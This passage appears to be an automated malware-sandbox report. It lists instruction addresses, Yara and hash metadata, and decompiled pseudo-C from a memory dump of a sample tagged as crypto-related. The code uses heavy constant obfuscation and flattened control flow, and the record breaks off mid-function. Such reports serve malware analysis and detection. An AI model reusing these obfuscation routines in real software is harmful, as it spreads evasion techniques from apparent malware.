                          0x01219346
                          0x0121934b
                          0x01219351
                          0x01219359
                          0x01219361
                          0x01219369
                          0x01219371
                          0x01219379
                          0x01219381
                          0x01219389
                          0x01219395
                          0x0121939a
                          0x012193a0
                          0x012193a8
                          0x012193b0
                          0x012193b8
                          0x012193c0
                          0x012193c8
                          0x012193d0
                          0x012193d8
                          0x012193dc
                          0x012193e1
                          0x012193e7
                          0x012193ef
                          0x012193fc
                          0x012193fd
                          0x01219401
                          0x0121940e
                          0x01219412
                          0x0121941a
                          0x01219422
                          0x0121942a
                          0x01219432
                          0x01219440
                          0x01219444
                          0x0121944c
                          0x01219454
                          0x0121945e
                          0x0121946c
                          0x01219471
                          0x01219477
                          0x01219484
                          0x01219491
                          0x01219499
                          0x0121949e
                          0x012194a6
                          0x012194ae
                          0x012194b6
                          0x012194be
                          0x012194c6
                          0x012194ce
                          0x012194d7
                          0x012194dc
                          0x012194e2
                          0x012194ea
                          0x012194f2
                          0x012194fa
                          0x01219503
                          0x01219508
                          0x0121950e
                          0x01219516
                          0x0121951e
                          0x0121952a
                          0x0121952f
                          0x01219535
                          0x0121953d
                          0x01219545
                          0x0121954d
                          0x01219555
                          0x0121955d
                          0x01219565
                          0x0121956d
                          0x01219575
                          0x0121957d
                          0x01219585
                          0x0121958d
                          0x01219599
                          0x0121959c
                          0x012195a0
                          0x012195a8
                          0x012195b0
                          0x012195b0
                          0x012195be
                          0x01219690
                          0x01219695
                          0x01219698
                          0x00000000
                          0x012195c4
                          0x012195c6
                          0x0121960a
                          0x01219613
                          0x0121961b
                          0x01219621
                          0x0121964f
                          0x01219666
                          0x0121966b
                          0x0121966e
                          0x00000000
                          0x012195c8
                          0x012195ce
                          0x012195e0
                          0x012195ef
                          0x012195fe
                          0x01219600
                          0x01219603
                          0x00000000
                          0x012195d0
                          0x012195d6
                          0x012195dc
                          0x00000000
                          0x012195dc
                          0x012195d6
                          0x012195ce
                          0x012195c6
                          0x00000000
                          0x012195be
                          0x012196ac
                          0x012196b2
                          0x012196b7
                          0x012196b7
                          0x012196b7
                          0x012196cf

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 4$:9$V<5$jML$xDv$}n
                          • API String ID: 0-3443733993
                          • Opcode ID: 87326eb8a4c5a423d0a5da4a23d488dddfc4573bf5a6ca844c5f90a24ed92b0d
                          • Instruction ID: 931ace6b2e86a0f3beaa33609f9cb54353856a631e4fae10830e560785043bb4
                          • Opcode Fuzzy Hash: 87326eb8a4c5a423d0a5da4a23d488dddfc4573bf5a6ca844c5f90a24ed92b0d
                          • Instruction Fuzzy Hash: 42A166715083419FC768CF26D88945BBFE2FBC4368F508A1DF2964A260D7B5C94ACF86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0121B191, Relevance: 7.6, Strings: 6, Instructions: 121COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 89%
                          			E0121B191(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				void* _t87;
				intOrPtr _t102;
				signed int _t103;
				void* _t106;
				void* _t115;
				intOrPtr _t116;
				void* _t118;
				void* _t119;

				_push(_a12);
				_t115 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0121358A(_t87);
				_v16 = 0x72b2bc;
				_t116 = 0;
				_v12 = 0x705e77;
				_t119 = _t118 + 0x14;
				_v8 = 0xd14ec7;
				_v4 = 0;
				_t106 = 0xfb323eb;
				_v20 = 0xe3d97e;
				_v20 = _v20 + 0xa7af;
				_v20 = _v20 ^ 0x00ee512d;
				_v24 = 0x168632;
				_v24 = _v24 + 0xe123;
				_v24 = _v24 ^ 0x0013eb0e;
				_v52 = 0x2e6341;
				_v52 = _v52 + 0x6d01;
				_v52 = _v52 ^ 0x28be2519;
				_v52 = _v52 >> 6;
				_v52 = _v52 ^ 0x00a7ba25;
				_v28 = 0xa881c2;
				_t103 = 0x39;
				_v28 = _v28 / _t103;
				_v28 = _v28 ^ 0x0004b18f;
				_v36 = 0x75efe3;
				_v36 = _v36 + 0xffff14c9;
				_v36 = _v36 * 0x52;
				_v36 = _v36 ^ 0x257d5f4a;
				_v44 = 0xecaef1;
				_v44 = _v44 | 0xcde27ad1;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x0cdc2a09;
				_v48 = 0x721bd8;
				_v48 = _v48 + 0x9e1e;
				_v48 = _v48 ^ 0xc9ddf5a6;
				_v48 = _v48 + 0x9d39;
				_v48 = _v48 ^ 0xc9a9f81f;
				_v40 = 0x4c90da;
				_v40 = _v40 ^ 0xc1c5c1e6;
				_v40 = _v40 + 0x4b08;
				_v40 = _v40 << 0xf;
				_v40 = _v40 ^ 0xce2bca86;
				_v32 = 0x49392c;
				_v32 = _v32 | 0xf96d8842;
				_v32 = _v32 >> 6;
				_v32 = _v32 ^ 0x03e22426;
				do {
					while(_t106 != 0x14f632d) {
						if(_t106 == 0x35d454c) {
							_t116 = E012294A1(_v36, _t115, _a12, _v44, _v48);
							_t119 = _t119 + 0xc;
							if(_t116 == 0) {
								_t106 = 0x14f632d;
								continue;
							}
						} else {
							if(_t106 == 0x56d459c) {
								E0121AE43( *0x1235208, _v40, _v32);
							} else {
								if(_t106 == 0x61a974e) {
									if(E0121800A() != 0) {
										_t106 = 0x35d454c;
										continue;
									}
								} else {
									if(_t106 != 0xfb323eb) {
										goto L12;
									} else {
										_push(_t106);
										_push(_t106);
										_t102 = E01225212(0x34);
										_t119 = _t119 + 0xc;
										 *0x1235208 = _t102;
										_t106 = 0x61a974e;
										continue;
									}
								}
							}
						}
						L15:
						return _t116;
					}
					E01217D63();
					_t106 = 0x56d459c;
					L12:
				} while (_t106 != 0x6f91342);
				goto L15;
			}
























                          0x0121b198
                          0x0121b19c
                          0x0121b19e
                          0x0121b1a2
                          0x0121b1a6
                          0x0121b1a7
                          0x0121b1a8
                          0x0121b1ad
                          0x0121b1b5
                          0x0121b1b7
                          0x0121b1bf
                          0x0121b1c2
                          0x0121b1cc
                          0x0121b1d0
                          0x0121b1d5
                          0x0121b1e2
                          0x0121b1ea
                          0x0121b1f2
                          0x0121b1fa
                          0x0121b202
                          0x0121b20a
                          0x0121b212
                          0x0121b21a
                          0x0121b222
                          0x0121b227
                          0x0121b22f
                          0x0121b23d
                          0x0121b245
                          0x0121b249
                          0x0121b251
                          0x0121b259
                          0x0121b266
                          0x0121b26a
                          0x0121b272
                          0x0121b282
                          0x0121b28a
                          0x0121b28f
                          0x0121b297
                          0x0121b29f
                          0x0121b2a7
                          0x0121b2af
                          0x0121b2b7
                          0x0121b2bf
                          0x0121b2c7
                          0x0121b2cf
                          0x0121b2d7
                          0x0121b2dc
                          0x0121b2e4
                          0x0121b2ec
                          0x0121b2f4
                          0x0121b2f9
                          0x0121b301
                          0x0121b301
                          0x0121b307
                          0x0121b371
                          0x0121b373
                          0x0121b378
                          0x0121b37a
                          0x00000000
                          0x0121b37a
                          0x0121b309
                          0x0121b30f
                          0x0121b3a4
                          0x0121b315
                          0x0121b31b
                          0x0121b354
                          0x0121b356
                          0x00000000
                          0x0121b356
                          0x0121b31d
                          0x0121b323
                          0x00000000
                          0x0121b325
                          0x0121b335
                          0x0121b336
                          0x0121b339
                          0x0121b33e
                          0x0121b341
                          0x0121b346
                          0x00000000
                          0x0121b346
                          0x0121b323
                          0x0121b31b
                          0x0121b30f
                          0x0121b3ab
                          0x0121b3b3
                          0x0121b3b3
                          0x0121b37e
                          0x0121b383
                          0x0121b388
                          0x0121b388
                          0x00000000

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: #$,9I$-Q$Ac.$J_}%$w^p
                          • API String ID: 0-1558224833
                          • Opcode ID: ee093dea655e36cd8a6d0503fbc13dcfc92b8f0133854131da404d92af03bff4
                          • Instruction ID: 3c594e02dc9396dbb0cc333ffb14c0d20861cb44dc1dd65a54dadaae173b6231
                          • Opcode Fuzzy Hash: ee093dea655e36cd8a6d0503fbc13dcfc92b8f0133854131da404d92af03bff4
                          • Instruction Fuzzy Hash: 7C5186715193028FC754CF25D88942FBAF0FBE8718F004A1DF98592224C7B08A19CF87
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122009A, Relevance: 6.6, Strings: 5, Instructions: 367COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 99%
                          			E0122009A() {
				void* _t370;
				signed int _t373;
				signed int _t374;
				signed int _t376;
				signed int _t377;
				signed int _t382;
				signed int _t386;
				void* _t396;
				signed int _t438;
				signed int _t441;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t454;
				void* _t458;

				 *(_t458 + 0x14) = 0x3127b6;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) + 0x501f;
				_t396 = 0xc84d6e5;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) >> 3;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) ^ 0xab1f0be8;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) ^ 0xab192513;
				 *(_t458 + 0x84) = 0xead28e;
				 *(_t458 + 0x84) =  *(_t458 + 0x84) << 8;
				 *(_t458 + 0x84) =  *(_t458 + 0x84) ^ 0xead28e01;
				 *(_t458 + 0x58) = 0xa603c7;
				 *(_t458 + 0x58) =  *(_t458 + 0x58) << 4;
				 *(_t458 + 0x58) =  *(_t458 + 0x58) ^ 0x0a603c73;
				 *(_t458 + 0x20) = 0xd43d7;
				_t441 = 0x19;
				 *(_t458 + 0x34) =  *(_t458 + 0x20) / _t441;
				_t442 = 0x7f;
				 *(_t458 + 0xa0) =  *(_t458 + 0xa0) & 0x00000000;
				 *(_t458 + 0x34) =  *(_t458 + 0x34) * 0x62;
				 *(_t458 + 0x34) =  *(_t458 + 0x34) + 0x15ce;
				 *(_t458 + 0x34) =  *(_t458 + 0x34) ^ 0x0035fdbc;
				 *(_t458 + 0x24) = 0xcee8b3;
				 *(_t458 + 0x24) =  *(_t458 + 0x24) * 0x1f;
				 *(_t458 + 0x24) =  *(_t458 + 0x24) + 0xffffb410;
				 *(_t458 + 0x24) =  *(_t458 + 0x24) + 0xffff3666;
				 *(_t458 + 0x24) =  *(_t458 + 0x24) ^ 0x190b3840;
				 *(_t458 + 0x58) = 0xf0b132;
				 *(_t458 + 0x58) =  *(_t458 + 0x58) << 0xa;
				 *(_t458 + 0x58) =  *(_t458 + 0x58) << 0xb;
				 *(_t458 + 0x58) =  *(_t458 + 0x58) ^ 0x264f52b7;
				 *(_t458 + 0x80) = 0xeefa29;
				 *(_t458 + 0x80) =  *(_t458 + 0x80) >> 6;
				 *(_t458 + 0x80) =  *(_t458 + 0x80) ^ 0x000c8dda;
				 *(_t458 + 0x14) = 0x6e7891;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) << 1;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) | 0x206ddb98;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) + 0xf540;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) ^ 0x20fb2a0e;
				 *(_t458 + 0xa0) = 0x7b1987;
				 *(_t458 + 0xa0) =  *(_t458 + 0xa0) + 0xffff8270;
				 *(_t458 + 0xa0) =  *(_t458 + 0xa0) ^ 0x007957fd;
				 *(_t458 + 0x48) = 0x5a70f5;
				 *(_t458 + 0x48) =  *(_t458 + 0x48) ^ 0x745daa51;
				 *(_t458 + 0x48) =  *(_t458 + 0x48) << 8;
				 *(_t458 + 0x48) =  *(_t458 + 0x48) ^ 0x07d09786;
				 *(_t458 + 0x3c) = 0x5eb3d0;
				 *(_t458 + 0x3c) =  *(_t458 + 0x3c) * 0x19;
				 *(_t458 + 0x3c) =  *(_t458 + 0x3c) | 0x9bc2572d;
				 *(_t458 + 0x3c) =  *(_t458 + 0x3c) << 4;
				 *(_t458 + 0x3c) =  *(_t458 + 0x3c) ^ 0xbffb3dbe;
				 *(_t458 + 0x60) = 0x3bfa6d;
				 *(_t458 + 0x60) =  *(_t458 + 0x60) * 0x4e;
				 *(_t458 + 0x60) =  *(_t458 + 0x60) / _t442;
				 *(_t458 + 0x60) =  *(_t458 + 0x60) ^ 0x002ef700;
				 *(_t458 + 0x78) = 0xa849f2;
				 *(_t458 + 0x78) =  *(_t458 + 0x78) + 0xffff7113;
				 *(_t458 + 0x78) =  *(_t458 + 0x78) ^ 0x00a83a7d;
				 *(_t458 + 0x90) = 0xc53e7;
				 *(_t458 + 0x90) =  *(_t458 + 0x90) + 0x57b6;
				 *(_t458 + 0x90) =  *(_t458 + 0x90) ^ 0x00029b15;
				 *(_t458 + 0x1c) = 0xd8bfcd;
				 *(_t458 + 0x1c) =  *(_t458 + 0x1c) + 0xa3cf;
				 *(_t458 + 0x1c) =  *(_t458 + 0x1c) + 0xffffa95b;
				_t443 = 0x7b;
				 *(_t458 + 0x1c) =  *(_t458 + 0x1c) / _t443;
				 *(_t458 + 0x1c) =  *(_t458 + 0x1c) ^ 0x000583c4;
				 *(_t458 + 0x9c) = 0x9fee94;
				 *(_t458 + 0x9c) =  *(_t458 + 0x9c) << 8;
				 *(_t458 + 0x9c) =  *(_t458 + 0x9c) ^ 0x9fe43700;
				 *(_t458 + 0x4c) = 0xeb8083;
				 *(_t458 + 0x4c) =  *(_t458 + 0x4c) << 0xc;
				 *(_t458 + 0x4c) =  *(_t458 + 0x4c) + 0x14bb;
				 *(_t458 + 0x4c) =  *(_t458 + 0x4c) ^ 0xb8043e5d;
				 *(_t458 + 0x50) = 0x1c25e4;
				_t444 = 0x39;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) / _t444;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) + 0xd0f9;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) ^ 0x000e2e83;
				 *(_t458 + 0x2c) = 0x4dc3c6;
				 *(_t458 + 0x2c) =  *(_t458 + 0x2c) + 0xffff3534;
				_t445 = 0x3d;
				 *(_t458 + 0x2c) =  *(_t458 + 0x2c) / _t445;
				 *(_t458 + 0x2c) =  *(_t458 + 0x2c) + 0xffffbc4e;
				 *(_t458 + 0x2c) =  *(_t458 + 0x2c) ^ 0x0000b338;
				 *(_t458 + 0x5c) = 0xeb2055;
				_t157 = _t458 + 0x5c; // 0xeb2055
				_t446 = 0x27;
				 *(_t458 + 0x5c) =  *_t157 / _t446;
				 *(_t458 + 0x5c) =  *(_t458 + 0x5c) + 0xf727;
				 *(_t458 + 0x5c) =  *(_t458 + 0x5c) ^ 0x00061ec9;
				 *(_t458 + 0x70) = 0x47fd75;
				_t447 = 0x38;
				 *(_t458 + 0x70) =  *(_t458 + 0x70) * 0x4b;
				 *(_t458 + 0x70) =  *(_t458 + 0x70) ^ 0x151aa5c9;
				 *(_t458 + 0x94) = 0x71480;
				 *(_t458 + 0x94) =  *(_t458 + 0x94) >> 0xf;
				 *(_t458 + 0x94) =  *(_t458 + 0x94) ^ 0x000ac54a;
				 *(_t458 + 0x44) = 0x7bf82;
				 *(_t458 + 0x44) =  *(_t458 + 0x44) >> 4;
				 *(_t458 + 0x44) =  *(_t458 + 0x44) / _t447;
				 *(_t458 + 0x44) =  *(_t458 + 0x44) ^ 0x000ef3bb;
				 *(_t458 + 0x88) = 0x5fe667;
				 *(_t458 + 0x88) =  *(_t458 + 0x88) << 2;
				 *(_t458 + 0x88) =  *(_t458 + 0x88) ^ 0x0178e5f6;
				 *(_t458 + 0x20) = 0xdf2a1c;
				 *(_t458 + 0x20) =  *(_t458 + 0x20) >> 0xf;
				 *(_t458 + 0x20) =  *(_t458 + 0x20) + 0xffff3b4a;
				 *(_t458 + 0x20) =  *(_t458 + 0x20) + 0x8959;
				 *(_t458 + 0x20) =  *(_t458 + 0x20) ^ 0xfff05f31;
				 *(_t458 + 0x7c) = 0xc2ce80;
				_t448 = 0x71;
				 *(_t458 + 0x7c) =  *(_t458 + 0x7c) / _t448;
				 *(_t458 + 0x7c) =  *(_t458 + 0x7c) ^ 0x00020205;
				 *(_t458 + 0x74) = 0x8c7ae;
				 *(_t458 + 0x74) =  *(_t458 + 0x74) * 0x1a;
				 *(_t458 + 0x74) =  *(_t458 + 0x74) ^ 0x00e60ce8;
				 *(_t458 + 0x30) = 0xd6e3cb;
				 *(_t458 + 0x30) =  *(_t458 + 0x30) >> 0xf;
				 *(_t458 + 0x30) =  *(_t458 + 0x30) ^ 0x22693c26;
				_t449 = 0x50;
				 *(_t458 + 0x30) =  *(_t458 + 0x30) / _t449;
				 *(_t458 + 0x30) =  *(_t458 + 0x30) ^ 0x006815e9;
				 *(_t458 + 0x40) = 0x5e451e;
				_t450 = 0x55;
				 *(_t458 + 0x40) =  *(_t458 + 0x40) / _t450;
				 *(_t458 + 0x40) =  *(_t458 + 0x40) + 0xe452;
				 *(_t458 + 0x40) =  *(_t458 + 0x40) | 0x7e47935e;
				 *(_t458 + 0x40) =  *(_t458 + 0x40) ^ 0x7e41dc87;
				 *(_t458 + 0x38) = 0x64d679;
				 *(_t458 + 0x38) =  *(_t458 + 0x38) >> 0xd;
				 *(_t458 + 0x38) =  *(_t458 + 0x38) ^ 0x0d922049;
				 *(_t458 + 0x38) =  *(_t458 + 0x38) + 0xffff1786;
				 *(_t458 + 0x38) =  *(_t458 + 0x38) ^ 0x0d93bc9f;
				 *(_t458 + 0x64) = 0x1b4ca2;
				_t451 = 0x54;
				_t456 =  *(_t458 + 0x64);
				 *(_t458 + 0x60) =  *(_t458 + 0x64) / _t451;
				 *(_t458 + 0x60) =  *(_t458 + 0x60) >> 2;
				 *(_t458 + 0x60) =  *(_t458 + 0x60) ^ 0x000c66fe;
				 *(_t458 + 0x50) = 0x45c27f;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) << 8;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) << 0xa;
				 *(_t458 + 0x50) =  *(_t458 + 0x50) ^ 0x09f3ae62;
				 *(_t458 + 0x14) = 0xcbc3ee;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) | 0xadd76dc9;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) + 0xfffff87b;
				_t394 =  *(_t458 + 0x64);
				_t438 =  *(_t458 + 0x64);
				_t452 =  *(_t458 + 0x64);
				 *(_t458 + 0x14) =  *(_t458 + 0x14) * 0x5f;
				 *(_t458 + 0x14) =  *(_t458 + 0x14) ^ 0x8617258e;
				 *(_t458 + 0x88) = 0xace0bc;
				 *(_t458 + 0x88) =  *(_t458 + 0x88) * 0x57;
				 *(_t458 + 0x88) =  *(_t458 + 0x88) ^ 0x3acf2778;
				 *(_t458 + 0x80) = 0xfb2866;
				 *(_t458 + 0x80) =  *(_t458 + 0x80) + 0xffff2346;
				 *(_t458 + 0x80) =  *(_t458 + 0x80) ^ 0x00fffb65;
				while(1) {
					L1:
					_t370 = 0x465510d;
					L2:
					while(_t396 != 0x4ca64a) {
						if(_t396 == _t370) {
							_t373 = E0121B0D4( *((intOrPtr*)(_t458 + 0x98)), _t452,  *((intOrPtr*)(_t458 + 0xb8)), _t396,  *(_t458 + 0x60),  *(_t458 + 0x40), _t438,  *((intOrPtr*)(_t458 + 0x98)), _t396,  *((intOrPtr*)(_t458 + 0x28)), _t396, _t458 + 0xa8, _t394);
							_t458 = _t458 + 0x2c;
							__eflags = _t373;
							if(_t373 == 0) {
								_t374 =  *(_t458 + 0xa0);
							} else {
								_t454 = _t438;
								while(1) {
									__eflags =  *((intOrPtr*)(_t454 + 4)) - 4;
									if( *((intOrPtr*)(_t454 + 4)) != 4) {
										goto L19;
									}
									L18:
									_t327 = _t454 + 0xc; // 0x1b4cae
									_t435 = _t327;
									_t377 = E01212C3A( *(_t458 + 0x84), _t327,  *(_t458 + 0x78), _t456,  *(_t458 + 0x2c));
									_t458 = _t458 + 0xc;
									__eflags = _t377;
									if(_t377 == 0) {
										_t374 = 1;
										 *(_t458 + 0xa0) = 1;
									} else {
										goto L19;
									}
									L24:
									_t452 =  *(_t458 + 0x64);
									goto L25;
									L19:
									_t376 =  *_t454;
									__eflags = _t376;
									if(_t376 == 0) {
										_t374 =  *(_t458 + 0xa0);
									} else {
										_t454 = _t454 + _t376;
										__eflags =  *((intOrPtr*)(_t454 + 4)) - 4;
										if( *((intOrPtr*)(_t454 + 4)) != 4) {
											goto L19;
										}
									}
									goto L24;
								}
							}
							L25:
							__eflags = _t374;
							if(__eflags == 0) {
								_t370 = 0x465510d;
								_t396 = 0x465510d;
								continue;
							} else {
								_t435 =  *(_t458 + 0x44);
								E01217513( *((intOrPtr*)( *0x1235214 + 0x14)),  *(_t458 + 0x44),  *(_t458 + 0x38),  *(_t458 + 0x60));
								_t396 = 0x52d1d29;
								goto L1;
							}
							L31:
						} else {
							if(_t396 == 0x52d1d29) {
								_t435 =  *(_t458 + 0x54);
								E0121AE43(_t438,  *(_t458 + 0x54),  *(_t458 + 0x14));
								_t396 = 0x4ca64a;
								while(1) {
									L1:
									_t370 = 0x465510d;
									goto L2;
								}
							} else {
								if(_t396 == 0x6a2ac4c) {
									E0122855C(_t458 + 0xb4,  *(_t458 + 0x40), __eflags,  *(_t458 + 0x2c),  *(_t458 + 0x5c), _t396,  *(_t458 + 0x7c));
									_t435 =  *(_t458 + 0xb0);
									_t382 = E01212B69( *(_t458 + 0x24),  *(_t458 + 0xb0), _t458 + 0xbc,  *(_t458 + 0x54));
									_t456 = _t382;
									_t458 = _t458 + 0x18;
									_t396 = 0x8bdce4a;
									 *((short*)(_t382 - 2)) = 0;
									while(1) {
										L1:
										_t370 = 0x465510d;
										goto L2;
									}
								} else {
									if(_t396 == 0x8bdce4a) {
										_t386 = E0122B302(_t458 + 0xc0, _t435,  *(_t458 + 0x60),  *(_t458 + 0x80), 1, 0x2000000,  *(_t458 + 0x80),  *(_t458 + 0x88), _t396,  *((intOrPtr*)(_t458 + 0x98)),  *(_t458 + 0x20),  *(_t458 + 0x9c),  *(_t458 + 0x94) | 0x00000006);
										_t394 = _t386;
										_t458 = _t458 + 0x2c;
										__eflags = _t386 - 0xffffffff;
										if(__eflags != 0) {
											_t396 = 0x99d27ae;
											while(1) {
												L1:
												_t370 = 0x465510d;
												goto L2;
											}
										}
									} else {
										if(_t396 == 0x99d27ae) {
											_t452 = 0x1000;
											_push(_t396);
											_push(_t396);
											 *(_t458 + 0x70) = 0x1000;
											_t438 = E01225212(0x1000);
											_t458 = _t458 + 0xc;
											__eflags = _t438;
											_t370 = 0x465510d;
											_t396 =  !=  ? 0x465510d : 0x4ca64a;
											continue;
										} else {
											if(_t396 != 0xc84d6e5) {
												L29:
												__eflags = _t396 - 0xb25d194;
												if(__eflags != 0) {
													continue;
												}
											} else {
												_t396 = 0x6a2ac4c;
												continue;
											}
										}
									}
								}
							}
						}
						__eflags = 0;
						return 0;
						goto L31;
					}
					E01224A33( *(_t458 + 0x88),  *(_t458 + 0x80), _t394);
					_t396 = 0xb25d194;
					_t370 = 0x465510d;
					goto L29;
				}
			}


























                          0x012200a0
                          0x012200aa
                          0x012200b2
                          0x012200b7
                          0x012200bc
                          0x012200c4
                          0x012200cc
                          0x012200d7
                          0x012200df
                          0x012200ea
                          0x012200f2
                          0x012200f7
                          0x012200ff
                          0x01220111
                          0x01220116
                          0x01220121
                          0x01220122
                          0x0122012c
                          0x01220130
                          0x01220138
                          0x01220140
                          0x0122014d
                          0x01220151
                          0x01220159
                          0x01220161
                          0x01220169
                          0x01220171
                          0x01220176
                          0x0122017b
                          0x01220183
                          0x0122018e
                          0x01220196
                          0x012201a1
                          0x012201a9
                          0x012201ad
                          0x012201b5
                          0x012201bd
                          0x012201c5
                          0x012201d0
                          0x012201db
                          0x012201e6
                          0x012201ee
                          0x012201f6
                          0x012201fb
                          0x01220203
                          0x01220210
                          0x01220214
                          0x0122021c
                          0x01220221
                          0x01220229
                          0x01220236
                          0x01220240
                          0x01220244
                          0x0122024c
                          0x01220254
                          0x0122025c
                          0x01220264
                          0x0122026f
                          0x0122027a
                          0x01220285
                          0x0122028d
                          0x01220295
                          0x012202a3
                          0x012202a8
                          0x012202ae
                          0x012202b6
                          0x012202c1
                          0x012202c9
                          0x012202d4
                          0x012202dc
                          0x012202e1
                          0x012202e9
                          0x012202f1
                          0x012202fd
                          0x01220302
                          0x01220308
                          0x01220310
                          0x01220318
                          0x01220320
                          0x0122032c
                          0x01220331
                          0x01220337
                          0x0122033f
                          0x01220347
                          0x0122034f
                          0x01220353
                          0x01220358
                          0x0122035e
                          0x01220366
                          0x0122036e
                          0x0122037b
                          0x0122037e
                          0x01220382
                          0x0122038a
                          0x01220395
                          0x0122039d
                          0x012203a8
                          0x012203b0
                          0x012203bd
                          0x012203c1
                          0x012203c9
                          0x012203d4
                          0x012203dc
                          0x012203e7
                          0x012203ef
                          0x012203f4
                          0x012203fc
                          0x01220404
                          0x0122040c
                          0x01220418
                          0x0122041d
                          0x01220421
                          0x01220429
                          0x01220436
                          0x0122043a
                          0x01220442
                          0x0122044a
                          0x0122044f
                          0x0122045d
                          0x01220462
                          0x01220468
                          0x01220470
                          0x0122047c
                          0x01220481
                          0x01220487
                          0x0122048f
                          0x01220497
                          0x0122049f
                          0x012204a7
                          0x012204ac
                          0x012204b4
                          0x012204bc
                          0x012204c4
                          0x012204d0
                          0x012204d3
                          0x012204d7
                          0x012204db
                          0x012204e0
                          0x012204e8
                          0x012204f0
                          0x012204f5
                          0x012204fa
                          0x01220502
                          0x0122050a
                          0x01220512
                          0x0122051f
                          0x01220523
                          0x01220527
                          0x0122052b
                          0x0122052f
                          0x01220537
                          0x0122054a
                          0x01220551
                          0x0122055c
                          0x01220567
                          0x01220572
                          0x0122057d
                          0x0122057d
                          0x0122057d
                          0x00000000
                          0x01220582
                          0x01220590
                          0x01220705
                          0x0122070a
                          0x0122070d
                          0x0122070f
                          0x0122074e
                          0x01220711
                          0x01220711
                          0x01220713
                          0x01220713
                          0x01220717
                          0x00000000
                          0x00000000
                          0x01220719
                          0x0122071d
                          0x0122071d
                          0x0122072c
                          0x01220731
                          0x01220734
                          0x01220736
                          0x01220744
                          0x01220745
                          0x00000000
                          0x00000000
                          0x00000000
                          0x0122075e
                          0x0122075e
                          0x00000000
                          0x01220738
                          0x01220738
                          0x0122073a
                          0x0122073c
                          0x01220757
                          0x0122073e
                          0x0122073e
                          0x01220713
                          0x01220717
                          0x00000000
                          0x00000000
                          0x01220717
                          0x00000000
                          0x0122073c
                          0x01220713
                          0x01220762
                          0x01220762
                          0x01220764
                          0x0122078c
                          0x01220791
                          0x00000000
                          0x01220766
                          0x0122076e
                          0x0122077b
                          0x01220782
                          0x00000000
                          0x01220782
                          0x00000000
                          0x01220596
                          0x0122059c
                          0x012206bf
                          0x012206c5
                          0x012206cb
                          0x0122057d
                          0x0122057d
                          0x0122057d
                          0x00000000
                          0x0122057d
                          0x012205a2
                          0x012205a8
                          0x01220685
                          0x0122068e
                          0x012206a1
                          0x012206a6
                          0x012206a8
                          0x012206ad
                          0x012206b2
                          0x0122057d
                          0x0122057d
                          0x0122057d
                          0x00000000
                          0x0122057d
                          0x012205ae
                          0x012205b4
                          0x01220650
                          0x01220655
                          0x01220657
                          0x0122065a
                          0x0122065d
                          0x01220663
                          0x0122057d
                          0x0122057d
                          0x0122057d
                          0x00000000
                          0x0122057d
                          0x0122057d
                          0x012205b6
                          0x012205bc
                          0x012205d5
                          0x012205e6
                          0x012205e7
                          0x012205e9
                          0x012205f2
                          0x012205f4
                          0x012205f7
                          0x012205fe
                          0x01220603
                          0x00000000
                          0x012205be
                          0x012205c4
                          0x012207b7
                          0x012207b7
                          0x012207bd
                          0x00000000
                          0x00000000
                          0x012205ca
                          0x012205ca
                          0x00000000
                          0x012205ca
                          0x012205c4
                          0x012205bc
                          0x012205b4
                          0x012205a8
                          0x0122059c
                          0x012207c6
                          0x012207cf
                          0x00000000
                          0x012207cf
                          0x012207a7
                          0x012207ad
                          0x012207b2
                          0x00000000
                          0x012207b2

                          Strings
                          Memory Dump Source
                          • Source File: 00000001.00000002.693163248.0000000001210000.00000040.00000010.sdmp, Offset: 01210000, based on PE: true
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: &<i"$R$U $g_$s<`
                          • API String ID: 0-3547921069
                          • Opcode ID: 70141203f60c489bec3732219833d8c3e09494b1af38b07a02068e685932e049
                          • Instruction ID: c615e5439ca4e03d6b6fe87ab38399a7d980d0f5367d6bb8144934eecc2a0376
                          • Opcode Fuzzy Hash: 70141203f60c489bec3732219833d8c3e09494b1af38b07a02068e685932e049
                          • Instruction Fuzzy Hash: B40263715183819FD368CF25C889A9FBBE1BBC4758F00891DF6DA9A260D7B49909CF43
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0122CE90, Relevance: 6.5, Strings: 5, Instructions: 292COMMONCrypto
                          Download Yara Rule
                          C-Code - Quality: 95%
                          			E0122CE90(intOrPtr* __ecx) {
				intOrPtr* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
